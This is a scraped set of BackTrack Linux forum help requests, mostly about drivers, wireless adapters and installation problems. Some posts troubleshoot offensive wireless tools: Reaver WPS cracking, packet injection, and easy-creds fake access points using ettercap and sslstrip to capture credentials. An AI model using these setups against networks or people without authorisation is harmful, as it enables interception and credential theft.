For the record I have checked the md5 sum and tried re-downloading and reburning the disc. I am also able to install windows xp just fine! I've also tried typing ubiquity at command line but nothing happens. I really appreciate any help you can give!
-
Hello Everyone,
First post here so hopefully I don't "bosh" this too terribly.
I have installed BT5r3 x64 on my desktop and have installed the ati catalyst drivers and SDK for my two cards "HD Raedon 6970". When I run the aticonfig --adapter=all --initial it creates the new /etc/X11/xorg.conf file as needed. However when I reboot the machine and startx, nautilus seems to create a endless looping for opening new windows. I can stop this for now by disabling the desktop feature for nautilus via gconf-editor but I would really like to use the desktop... I have looked for a resolution now for two days on off time and cant seem to get an answer.
If anyone anyone has any ideas or have run into this already please let me know.
Thank you,
-
I've installed Physical Address Extension on my 32bit system so I can access more than 4GB of memory. I'm curious if anyone has had any problems with PAE. So far things seem to be running well, but this is my home system which only has 4GB. I wanted to test it here before installing PAE on my work machine which has 16GB.
The reason I don't just upgrade to bt5r3 64bit is the problem it creates...
http://www.backtrack-linux.org/forum...ad.php?t=56539
-
Hello,
I got this book for Christmas that I am REALLY excited about:
Backtrack 5 Wireless Penetration Testing Beginner's Guide: Master Bleeding ... - Vivek Ramachandran - Google Books
I started reading it tonight and it says in order to set up the wireless lab you would need:
Two laptops with internal Wi-Fi cards
One Alfa wireless adapter
One access point
An Internet connection
It also briefly mentions that you can use Virtual Box, but doesn't give any details. I currently have two VMs set up in my VMware Player: Backtrack and Windows XP. Is it possible to set up a wireless lab this way and still be able to carry out the exercises in this book (for any who may be familiar with it)? Would I need to go out and get an Alfa wireless adapter as well for things like packet injections.
I'm very new to this and I'm hoping to build a foundation to work on. I'd really love to learn about wireless security and get some insights into Penetration Testing but I just don't have the room to set up a real wireless lab so I'd love to find a way to set up a lab that I could use to follow the exercises in this book using virtual machines. Any help would REALLY be appreciated!
Thank you so much!
-
-
Hello,
I am trying to create a startup script for backtrack that will alter my IP and MAC address on startup. I found several tutorials on how to write an init script, but I can't seem to find one that explains how to use /dev/random (random # generator) alongside the MAC and IP change commands.
Can I do this with /dev/random? Or is there a better function that is built into Ubuntu or the linux kernel?
How would I go about doing this? Also, can I implement this BEFORE the networking services run? Or do I need to wait until after then do the normal start/stop commands?
Thanks,
Imprive
-
I just got an Alfa Awus 036NHR and fresh installed BT5R3 and am having some problems with it. Ive read that its supposed to "work out of the box" on the current revision, but I am having issues with injection and Reaver. It says Chipset: unknown, Driver: Rtl8192cu. It passes the injection test, but doesnt seem to actually work in practice.. Like when Im using injection in Gerix or Aireplay I dont get any more IVs than just sitting on the connection... the stock Broadcom card in the ltop even gets 300+/sec. When using Reaver I get a constant loop of "-Sending EAPOL START request, -WARNING Receive timeout occurred." Im dying to get it working with injection and reaver... Imgonna go stay at my GF's place for the next few days, and she has no internet so if I could get this fixed tonight that would be amazing.
Do I still need to use compat wireless or some of the instructions from this thread?
http://www.backtrack-linux.org/forum...ghlight=036nhr , or is it supposed to "work out of the box"? Could it have something to do with interference from the broadcom card? something else? All help would be greatly appreciated..
Im not afraid of the console so I can test ideas if anybody has any or do diagnostics.
-
Hello everyone
I need a suitable tablet to install Back track 5 on it.
But I do not know Which is appropriate.
The price does not matter.
Please help me.
Thanks for your time and attention.
-
-
sorry not sure if this goes here but does anyone here have an IT degree from online? I'm not sure if business would take an online degree as serious as an actual college. What are your opinions and/or experiences? I am Military and leaving to korea in a few weeks so I can't really go to your average college due to relocation issues.
-
Hello, I am new on this forum and new with linux.
I have Atheros 9285 and when i type airodump-ng wlan0 got message:
ioctl (SIOCSIWMODE) failed: Device or resource busy...
it worked during the last two days bust suddenly stopped, i don't know why?
I downloaded new compat-wireless-3.6.8-1.tar.bz2 but i don't know how to install it.
I tried to fallow this instructions but it didn't work.
Building and installing
cd /path/to/compat-wireless-2.6.32-rc5
./scripts/driver-select <driver-name>
make
sudo make install
Can anyone tell me step by step,word by word what should i type in terminal, please? Is is only one command in one row? Instead of driver name i tried compat-wireless-3.6.8-1. and many combinations but didn't work. What is the driver name. I have never installed anything in linux.
Thanx,
-
Hey everyone
Sorry it's a bit long, skip to the tl;dr if you don't want to hear what I've done. I've been looking around at trying to find a good framework for what is a solid learning path for those starting off in the security realm of computing. I'll give you an idea of what I've done and what I'd like to achieve before asking a few questions. To begin with I reviewed a ton of video's on SecurityTube (awesome resource) including overviews of WLAN, Router Attacks, Metasploit, String Vulnerabilities, Assembly language etc etc. I feel from that I got a pretty solid overview of Metasploit and it's fundamentals along with possibilities with wireless, and an introduction to the other areas. From here I've read a heap of books including -
Completed
- Backtrack 4 - Assuring Security by Penetration Testing
- Lots of Certified Ethical Hacking Material
- Metasploit - The Penetration Testers Guide
- Google Hacking for Penetration Testers
- The Basics of Hacking and Penetration Testing
- Backtrack 5 - Wireless Penetration Testing
I'm also in the process of reading
- The Web Application Hacker's Handbook
- TCP/IP Illustrated
- Grey Hat Hacking - The Ethical Hacker's Handbook
On my "To Read" list after I finish the above
- The Shellcoders Handbook
- The Database Hackers Handbook
- The Debian Administrators Handbook
- Hacking Exposed Series
From these resources I feel I've got a solid understanding of the pen testers framework (obvious stages i.e. Information Gathering, Vulnerability Assessment, Exploiting, Maintaining access, etc). I've got a decent understanding of the tools used, or at least possibly used, in a wide range of circumstances such as those that backtrack offer. I understand how basic buffer overflows work along with format string vulnerabilities. I have a basic level of C, C#, C++ programming skill, I can 'read' a lot of others i.e. JavaScript, SQL, etc. I'm trying to work on some more scripting skills like Ruby and Bash at the moment. In terms of practicing I've set up my own wireless network for pentesting WLAN stuff, got some virtual machines with Metasploitable (v1 / v2), DE-ICE ISOs, Windows XP, OWASP Broken Web Apps etc. I'm aware of Smash the Stack which I'm not experienced enough to be good at yet, and done a few things on EnigmaGroup and HackThisSite.
Here is my problem -
Throughout all this I feel as though I've been picking up small pieces of knowledge, but I haven't gained really useful skills in any one single area. I feel as though I've done a broad sweep of pen testing and security, but now I have to make a choice as to where to drill down and learn really in depth, but there are so many choices. Exploit Writing. WLAN Security. Network Security. Web Applications. Reverse Engineering. Programming Languages. OS / Protocol Knowledge. Social Engineering. I don't know what are the best 'practical' skills to have as in which have the most real world use if I ever do wish to go into the pen testing industry one day. Can Web Application security ever really be learnt without an indepth knowledge of network security? etc etc.
Summary & TL;DR - I'm really really hoping there is a well thought out justification for a structured learning approach to security in general. This would look along the lines of - "You should learn ruby in depth first as it will allow you to execute these type of scripts against web servers. Once you can do that learn web servers in depth so you can gain access via these methods, and possibly then look into network security after so you can understand how you can pivot further into networks."
As you can see by the books I'm reading, I'm more than happy to learn. I'm more than happy to read a TON, I'm more than happy to accept it will be a path of many months / years before I get competent at what I'm doing, but I'd love to have a justification for the direction I'm taking rather than "Hmmm, getting a bit bored of WLAN password cracking, time to read on indepth shellcode exploits" which I fear will get me nowhere in the long run.
- Thanks if you made it all the way through.
-
hi guys
i have a problem on my BT5 R3 in connexion , when i connecte on internet using my alfa awus036h in the beginning evreything is alright but when it paste 1 minut the connexion is lost !! but i can see i still connecting with my rooter ! i have in power -65dbm , when i boot with win 7 there is no problem evreytihng is OK !
some commend :
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr dc:0e:a1:ac:42:2d
UP BROADCAST MULTICAST MTU:1500 Metric:1
Packets reçus:0 erreurs:0 :0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
Octets reçus:0 (0.0 B) Octets transmis:0 (0.0 B)
Interruption:16
lo Link encap:Boucle locale
inet adr:127.0.0.1 Masque:255.0.0.0
adr inet6: ::1/128 Scope:Hôte
UP LOOPBACK RUNNING MTU:16436 Metric:1
Packets reçus:390 erreurs:0 :0 overruns:0 frame:0
TX packets:390 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:0
Octets reçus:119006 (119.0 KB) Octets transmis:119006 (119.0 KB)
wlan0 Link encap:Ethernet HWaddr XX:XX:XX:XX:XX:XX
UP BROADCAST MULTICAST MTU:1500 Metric:1
Packets reçus:0 erreurs:0 :0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
Octets reçus:0 (0.0 B) Octets transmis:0 (0.0 B)
wlan1 Link encap:Ethernet HWaddr XX:XX:XX:XX:XX:XX
inet adr:XXX.XXX.1.X Bcast:XXX.XXX.1.XX5 Masque:XXX.XX5.XX.0
adr inet6: fe80::2c0:caff:fe6a:cd05/64 Scope:Lien
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Packets reçus:2941 erreurs:0 :0 overruns:0 frame:0
TX packets:3494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 lg file transmission:1000
Octets reçus:2951346 (2.9 MB) Octets transmis:440583 (440.5 KB)
root@bt:~# iwconfig
lo no wireless extensions.
wlan1 IEEE 802.11bg ESSID:"XXXX_XXX"
Mode:Managed Frequency:2.437 GHz Access Point: XX:XX:XX:XX:XX:XX
Bit Rate=54 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=44/70 Signal level=-66 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth0 no wireless extensions.
i hope u will help me and thank a lot
-
i am beginner to backtrack. And i installed Backtrack 5 gnome 32 bit .After i installed and reboot and i typed startx . And then
it says :
(EE)VESA(0):no valid modes
(EE)Screen(s) found, but none have a usable configuration.
Fatal server error: no screens found.
xinit:no such file or directory (errno 2): unable to connect to X server
xinit:no such process (errno 3): Serevr error
Then i searched in forums.. and they asked to install my nvidia graphic card driver..
My nividia card is Geforce 6150SE nForce 430.
And a post said to type this command : sudo apt-get install nvidia current nvidia-current-modaliases nvidia-settings
And when i did that. I get the following result:
Failed to fetch
http://32.repository.backtrack-linux...untu2_i386.deb
Could not resolve '32.repository.backtrack-linux.org'
Then.. i searched again and found with a post asking to find the networking card.And i did it with the command:lspci
and i dont get my network controller but i get this one
00:07.0 Bridge: nVidia Corporation MCP61 Ethernet (rev a2)
And again i searched and found command which is : iwconfig
and get these results
lo no wireless extensions
eth0 no wirelses extensions
And i type the following command:airmon-ng
and i get these result.
Interface Chipset Driver
----------------Thanks----------------
Please reply soon guys. i want to learn about linux more... Sorry for this long post.
-
Hey,
I am new here and hoepfully will learn a lot from these forums, Just joined a massively discounted networking course through
www.1weeksale.com but want to look mre into the hacking side to so trying to start off here. I am using backtrack 5 R3 in Vmware but my alfa wireless card in not dectected anywhere. I have tried all other threads but none resolve my issue. If some one can run me through a solution that would be great. The device works fine in windows but in the konsole i cannot get it to show up in different commands.
Many Thanks
-
I dont get it.....as i said on Windows when i go to my connection it says its WPA encrypted but while i go check on Backtrack it somehow says its WPA? I dont get it, why is it doing that?
I used many Connection programs on windows and all of em say WEP but on backtrack its WPA still? :confused:
-
Hello there. Let me just say that my englsih is not rly good, so sry 4 some bad words.
Following errors i got on 2x diferend usb.
Using a u "Universal-USB-Installer-1.9.2.1" i install BT r3 [MD5 checked, all ok] on usb. Run it and all look fine.
After set up some my setings i run "sudo apt-get update" followed by "sudo apt-get dist-upgrade"
He download 434 mb of update and start installing. After a loots of lines with unpacking and [i think] replacing he showed me some lines where say "cleanup" something...
anyway. after that he list bunch of errors mostly that there is not enough space on drive.
First i thinked is ok. then i try bouth update and dist-upgrade and he start download again.
Tryed same on 2nd usb flash, tryed with Unetbootin. same thing.
Do i missing something !?
-
i have backtrack5r3 since the ubdate i have no correct keyboard layout When i tibe i it comes 5 or when i tibe o comes 6, when i tibe m it comes 0 whats the broblem i must ever take the fn key then comes the right
-
i have backtrack5r3 since the ubdate i have no correct keyboard layout When i tibe i it comes 5 or when i tibe o comes 6, when i tibe m it comes 0 whats the broblem i must ever take the fn key then comes the right
-
Hi all,
My question is quite simple really, is it possible to backtrace a UDP flood attack to its original destination?
I know that the attacker can spoof its IP address, but is it possible to get around "the spoof" and find out the real IP?
If possible, what tools would be able to do this?
Thanks!
-
i have backtrack5r3 since the ubdate i have no correct keyboard layout When i tibe i it comes 5 or when i tibe o comes 6, when i tibe m it comes 0 whats the broblem i must ever take the fn key then comes the right
-
-
Hello!
When i run airodump (backtrack 5 r3 with rtl8187L) in the consol under "probe" it displays me crazy probes or three maybe four probes together. (multiple essid)
The problem is that some of these networks are too far from me or some of them don't even exist.
Any idea of that?
thanx
-
I am running an HP Compaq 6715b laptop wiith a 320g hdd and 4g of ram, dual booting with Win 7 ultimate and BackTrack5r3. I got past the log on issue and the wicd error in Backtrack with help from the wiki, but I could use some help with a couple of issues.
Issue 1:
I'm using an Asus USB N13 wireless adapter. My problem, I can see my network, but when I try to log on I get an error saying "connection failed:bad password". Now I know what my password is, I set it myself and windows has no problem logging on. Is there a way around this, I tried to give as much info as i could below.
Issue 2:
When I installed Backtrack I thought it would give me an option of how much of my 2nd partition to use but it took the whole 181g, how can I shrink it back to say 20 or 30g. I hope I gave enough info to help solve this.
These images I have to use are just plain stupid, took me 9 times to get this stupid thing right, I can't read them.
Thanks,
Clay
File allegati
-
-
Hello, all. I'm running BT5 on an Acer Aspire One D257. It comes with a wireless card and is capable of monitoring radio frequencies(RF) with airmon-ng. So, my question is how do I monitor RF or go about monitoring RF outside the range of normal wireless networking communications? Is it possible to monitor analog signals too? I'm no dummy, I realize this could take scripting and/or knowledge of writing code for drivers or firmware. I would like to use this for CB radio for future marine applications, but anything would be cool. Anything pointing me in the right direction would be much appreciated, like other forums for such a question anything. Thanks in advance.
Note: I realize that the FCC have regulations against such a thing in the U.S., but my plan is to use this in international waters. I know the U.S. government like to think their laws applies to the rest of the world but they don't.
-
HI
I'm not good at English so excuse me for my spelling mistakes
I'm a newbie in the system backtrack and I have a problem in the wireless adapter
Adapter wireless: asus usb-n13
When I put the adapter in the main system is working well, but when I put them in the placebo system it does not work ,but it sees and this is the proof:
Code:
root@bt:~# lsusb
Bus 002 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 004: ID 0b05:17ab ASUSTek Computer, Inc.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
when i write the command : (iwconfig) show me:
Code:
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
Drivers exist and this is proof :
Code:
root@bt:~# modinfo rtl8192cu
filename: /lib/modules/3.2.6/kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko
firmware: rtlwifi/rtl8192cufw.bin
description: Realtek 8192C/8188C 802.11n USB wireless
license: GPL
author: Larry Finger <Larry.Finger@lwfinger.net>
author: Ziv Huang <ziv_huang@realtek.com>
author: Georgia <georgia@realtek.com>
srcversion: 785C46E6EA7B8B1A492066F
alias: usb:v7392p7822d*dc*dsc*dp*ic*isc*ip*
alias: usb:v2019pAB2Bd*dc*dsc*dp*ic*isc*ip*
alias: usb:v2001p330Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v2001p3309d*dc*dsc*dp*ic*isc*ip*
alias: usb:v2001p3307d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8p8178d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07AAp0056d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0586p341Fd*dc*dsc*dp*ic*isc*ip*
alias: usb:v9846p9041d*dc*dsc*dp*ic*isc*ip*
alias: usb:v4855p0091d*dc*dsc*dp*ic*isc*ip*
alias: usb:v4855p0090d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13D3p3359d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13D3p3358d*dc*dsc*dp*ic*isc*ip*
alias: usb:v7392p7811d*dc*dsc*dp*ic*isc*ip*
alias: usb:v20F4p648Bd*dc*dsc*dp*ic*isc*ip*
alias: usb:v2019pED17d*dc*dsc*dp*ic*isc*ip*
alias: usb:v2019pAB2Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v2001p3308d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13D3p3357d*dc*dsc*dp*ic*isc*ip*
alias: usb:v103Cp1629d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0EB0p9071d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p0052d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0846p9041d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8p8189d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8p8188d*dc*dsc*dp*ic*isc*ip*
alias: usb:v06F8pE033d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp1102d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Cd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Bd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8177d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8754d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Fd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Ed*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Bd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp817Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8177d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8176d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8170d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0BDAp8191d*dc*dsc*dp*ic*isc*ip*
depends: rtlwifi,mac80211,rtl8192c-common
intree: Y
vermagic: 3.2.6 SMP mod_unload CORE2
parm: swenc:Set to 1 for software crypto (default 0)
(bool)
parm: debug:Set debug level (0-5) (default 0) (int)
issuing backtrack : 3 r3
i use vmware workstation 9
What is the solution?
:confused: :confused: :confused:
thanks in advace
-
Hi all,
I recently brought an Alfa AWUS036NH wireless card. After taking AGES to get it set up and running, I was finally able to see wireless networks coming up in the scan (after typing in the airodump command). So all should be good. The next time I booted BT and started running the scan again, I get nothing. The card is connected and when setting up i.e. the airmen-ng command, BT displays the card details etc but when I run the airodump command, it starts the scan but won't pick up any networks. I can't for the life of me work out y it was working and after a reboot it won't work. Any input on this issue will be great. I've been on BT wiki and followed a command on there but still the same issue.
Thanks for your help in advance guys!
-
I have set the wifi auto connect to router but every time when it boot up I have to click connect in wicd manually.
Another problem is that if I don't use wifi for a period, such as I didn't browse web page for 10 min, the wifi will disconnect. I have to keep ping some ip to make wifi alive. What is this problem?
-
Hey,
I'm trying to setup a fake AP using easy-cred and having an issue. The problem is that when I set up and run easy-cred my AP is broadcasted but I can't connect to it (via my iPhone). Just acts like it's connecting but doesn't do anything (window in BT shows association and re-association of my device. The problem I am guessing is one of the windows that easy-cred bring up.
Airbase-NG
DMESG
Ettercap - Tunnel
Dsniff
All work fine but there's one windows that shows an error: 'xterm: Can't execvp sslstrip: No such directory or file' between DMESG and Ettercap - tunnel.
Info:
Using Backtrack 5 r3 on on workstation on Windows 8
Ran apt-get update, apt-get upgrade.
Any ideas? What other ways are there to setup an AP without easycred? Thanks for any assistance!
-
hello ..
i have not good experience with linux :D
i have MacBook Pro 8.1 13-inch, Early 2011
( Processor 2.3 GHz Intel Core i5 Memory 4 GB 1333 MHz DDR3 Graphics Intel HD Graphics 3000 384 MB )
i have 4 native operating systems on it
1- mac osx 10.8
2- windows 8
3-ubuntu-12.10-desktop-amd64+mac
4-backtrack 5 r3 64 bit gnome
i installed all the operating systems with no problem at all and i use refit boot loader to boot to each system
the ubuntu-12.10 installed all the drivers automaticaly i didn't install any extra drivers the Intel HD Graphics is working with the same native resolution on os x operating system 1280x800
the problem is
on backtrack no drivers are installed so Intel HD Graphics is not giving me the native resolution 1280x800 it has to resolutions there 1024x768 & 800x600 the sound is not working to , the network allso not working i think the problem is that the backtrack has not efi booting but the new 12.10 ubuntu has it
i thing i maybe able to merge files from ubuntu.iso with backtrack.iso to solve the problem
the problem is the ubuntu iso files are very complicated it has the following files
..................
boot > grub > loopback.cfg
isolinux > grub > grub.cfg
isolinux > grub > efi.img
isolinux > grub > x86_64-efi > grub.cfg
and many other files
syslinux > grub > grub.cfg
syslinux > grub > efi.img
and many other files
syslinux > grub > x86_64-efi > grub.cfg
.................
so how can i merge ubunto files with backtrack files without problems and which grub.cfg to edit
i tried google and searched the forums here but nothing helped
so could any body help here
-
I have just installed BT5, R3 on Acer laptop. with Atheros card. I can see the following details
# lshw -C network
*-network
description: Wireless interface
product: AR9485 Wireless Network Adapter
vendor: Atheros Communications Inc.
physical id: 0
bus info: pci@0000:03:00.0
logical name: wlan0
version: 01
serial: 44:6d:57:a1:fc:6f
width: 64 bits
clock: 33MHz
In WICD, i can see wifi, but when i try to connect, it stops at obtaining ip, and then gives error of the same.
How to solve this???
-
Hi,
I have a TP-Link TL-WN721N usb wireless adapter installed and currently Windows 7 32 bit installed and working fine.
I downloaded BackTrack Linux 5 R3 and booted through USB. I can see wlan0 but not able to get IP address. I tried searching through iwlist wlan0 scan..I could see the essid of my wireless router but when I try to connect i get following error:
Error for wireless request "Set Encode" (8B2A).
SET failed on device wlan0; invalid argument.
My wireless router is Linksys WAG 160N. My SSID is broadcasing, 11th Channel, Security Mode is WPA2-Personal, Encryption => TKIP or AES and pre-shared key is all numerical values.
How do I connect to get the ip address.
Thanks a lot in advance.
-
Well Well its that time of the year where most will be playing with there new toys.
so i started playing with easy creds on making a fake ACP
now iv what iv done correct ill put a # at the side
Version 3.7.1 - Garden of Your Mind
At any time, ctrl+c to cancel and return to the main menu
1. Edit etter.conf #
2. Edit etter.dns #
3. Install dhcp3 server #
4. Install karmetasploit prereqs #
5. Add tunnel interface to dhcp3-server file #
6. Update Metasploit Framework #
7. Update Aircrack-ng #
8. Update SSLStrip #
9. How-to Videos (Launches Web Browser)
10. Previous Menu
Choice:
iv done the etter.conf and etter.dns
I think there is a problem with the dhcp3 and the conf file...
allso when i start the Fake AP command
i allways Do you have a dhcpd.conf file to use? [y/N]: n
and set the ips then i get this after setting them
[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.
./easy-creds.sh: line 776: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 777: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 778: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 779: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 780: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 781: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 782: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 783: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 784: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 785: /etc/dhcp/dhcpd.conf: No such file or directory
./easy-creds.sh: line 786: /etc/dhcp/dhcpd.conf: No such file or directory
[*] Launching Airbase with your settings.
Then in the 3rd box i get xterm: Can't execvp sslstrip: NO such file or dir
......
when its up and running i do get a fake AP but it will not connect..
Any help will be most helpful and sorry for the long post. btw im running ver5 r3 and all is upto date. fresh install. allso i have TEAMVIEWER installed......
-
-
im trying to manually set up my connection to access the internet.
i can connect perfectly with wicd and access internet however, when i manually set it up it says i am connected to my network. Even though it says im connected i can not access the internet. why?
so when i set everything up this is what i do.
encryption is wpa2
root@bt:~ifconfig wlan1 up 192.168.1.112
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf
then
root@bt:~iwconfig wlan1 essid "mynetwork" key "1598989898"
root@bt:~iwconfig wlan1 ap 00:11:58:F5:8F:18
now after i do all this it says im connected to my mynetwork
also i pinged myself and in the logs it says unknown inbound session stopped. this tells me im connected but im not sure why the sessions was stopped?
also i was able to set up mon1 mode using airmong-ng. After i set it up i did some packet sniffing that worked perfectly.
anyone have any ideas?
-
may seem trivial but it comes from the heart:
a big wish you Happy Holidays && Merry Christmas ! to....
all "" backtrack-users "" and especially to all those who work around this magnificent distribution (team, developers,testers, old-forum-members, etc. ... etc.
bye! :-)
-
-
Hi,
I am struggling with sharing my windows 7 (host) shared folder with BT3 running in Virtualbox 4.1.22 (shared via Device-> Share Folders). and then I am using options from page
https://help.ubuntu.com/community/Vi.../SharedFolders
like mount -t vboxsf winshare /home/winshare/
but receiving Protocol error.
I even installed Extension pack suggested here
http://stackoverflow.com/questions/1...uest-fedora-16
but no luck.
Will appreciate some advise.
Thanks
-
Hi everyone,
I recently installed BT5 on my laptop, ASUS U30JC, and i'm stuck with the 1024x768 resolution. I normally have 1366x768. My graphic card is a GeForce 310M
I tried to change it in the Monitor Options, but I only have 1024x768.
I also tried in /usr/share/xresprobe/xorg.conf but didn't work.
If you need any other information ask me, and if you have any clue don't hesitate to tell me !
Thanks.
-
Hello,
I put backtrack on my USB stick to install on my computer
I have a 750GB hard drive
A C: partition 100GB for Windows
Another partition D: 550Go for document
and normally remains unallocated 50GB for my backtrack :)
But I'm lost .. to install backtrack, he offers everything formatted ..
I would like to install backtrack on 50GB non allocated
How? thank you
Sorry for my bad english-*
-
Hi to all. I am trying to install Backtrack on a fast read and write flash drive with 32 gigs of space. After typing fdisk /dev/sdb1 and pressing enter, here is the message I get:
The number of cylinders for this disk is set to 30532. There is nothing wrong with that, but this is larger than 1024, and could in certain setups cause problems with:
1. software that runs at boot time (e.g. old versions of LILO)
2. booting and partitioning software from other OSs (e.g. DOS FDISK, OS/2 FDISK)
I am new to this and hope someone may be able to stear me in the right direction. Thanks to all in advance.
Anthony
-
"BT5r3 64bit GNOME" HOST won't create a network interface for USB wireless adapter, but "BT5r3 64bit GNOME" VM creates a network interface such as wlan0.
Hello folks,
I had installed "Backtrack 5 R3 64bit GNOME" in an External USB HDD. BT5r3 "automatically" recognizes the built-in wireless/wired card and show its network interface as wlan0/eth0 respectively. It also detects the USB wireless adapter via "lsusb" command, but it doesn't create a network interface such as wlan1.
"lsusb" command shows:
-------------- Atheros Communications, Inc. AR9271 802.11n
The USB wireless adapter is supported by the preloaded drivers of BT5r3 because...
When I install "BT5r3 64bit GNOME" in a VM, it "automatically" detects my USB wireless adapter, so it creates a network interface as "wlan0".
I had tried different ways that I had found in the internet but it doesn't seem to work for me. Some of the things that I've done so far:
- at first I install driver ath9k_htc, do lsmod, modprobe, reboot PC etc... - didn't work for me
- install also ndiswrapper... - didn't work either
- airmon-ng ONLY shows the built-in wifi, NOT the USB wi-fi adapter. The built-in wi-fi is named "wlan0" by the HOST:
Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
- I already upgraded BT5r3... - didn't work
- in the end I found out that THERE IS NO NEED for the USB wi-fi driver installation because "BT5r3 in VM" automatically detects USB wi-fi adapter and creates an interface as wlan0.
- meaning to say that upon installation of BT5r3, BT5r3 has the driver for this type of hardware USB wi-fi adapter.
- I modify the file in the HOST
/etc/udev/rules.d/70-persistent-net.rules
- I used the same file in the VM that has the USB wireless info, then replace the HOST file
- also try to renamed the HOST file built-in wi-fi "wlan0" to "wlan1", still no interface for USB wi-fi - let's say as wlan0 (I'm hoping that after rebooting, the HOST will create another interface for USB wireless adapter)
- I also try to erase this HOST file then reboot PC, hoping that the new file that it will create has additional interface such as wlan1.
How can I make my HOST "BT5r3 64bit GNOME" creates a network interface for my USB wirelesss adapter? Thanks. :)
-
-
Hi,
Im determined to get to grips with BT, after many years of it being elusive, i need to buy a wifi card this week.
If anyone can suggest a new-but-tried-and-tested model, ideally somthing which has a big range too (so if the worst comes to the worst and i cant get BT working it will still have some use).
also im in tokyo, so if you could suggest a wifi card which could be brought in a shop, i cant do online shopping here.
thanks.
-
Like the title says I'm running the new "Trinity" AMD A10-5800K APU. I'm trying to get the gpu to work in pyrit. I have gotten my laptop's Llano gpu to work, but i'm not able to get my current desktop gpu to work. The on-chip gpu is designated HD 7660D but it is my understanding that it is still based in the HD 6000 series architecture. My question is to utilize my gpu should i being using cal++ or opencl. or is it possible at all with these new chips?
I tried using the tutorials found on this forum but after running pyrit list_cores the gpu is not being recognized.
-
Does anyone know if this card is any good, for bt5 r3 injection and monitor mode?
Link :
http://www.zoominformatica.com/detal...18DBI_WIFI&r=1
Thank you
-
-
HI
Iam using backtrack for a while in vmware.
usually i wil not be able to connect to internet but somhow use to manage , click on something and make it to connect.
but somedays before i think i changed some of the settings where i am not able to ping to host ,not even to default gateway...
if set the ip to 192.168.1.20
however every time when i disconnect and connect again through wicd it is changing the ip 10.0.0.100.
and in netstat it shows port open in 10.0.0.100
i have stuck in this for a while ,pls help me .....:confused::confused:
anyway thanks in advance....
:D:D
-
Ok i got all everything else running Did everything i'm suppose to do but atftpd server won't start i think, because when i run netstat it shows nothing running anyone got any ideal whats wrong.
Oh yeah i'm running this on a parallels desktop 7 virtual on a macbook pro.
Thanks all.
-
Hi Guys,
I've searched the forum and the internet but there seems to be no drivers for the Line6 KB37 in Backtrack.
I did however see that are some drivers in Ubuntu Studio but i have no idea how to download them into Backtrack.
Would it possible for anyone to help me please?
Thanks,
Taran.
-
Hi I was trying to get Adobe flash installed while doing that firefox quit unexpectedly and came up with this error message how do I fix this?
There was an error launching application.
Details: Failed to execute child process "firefox" (no such file or directory)
-
Does anyone know how attack_batch technically works?
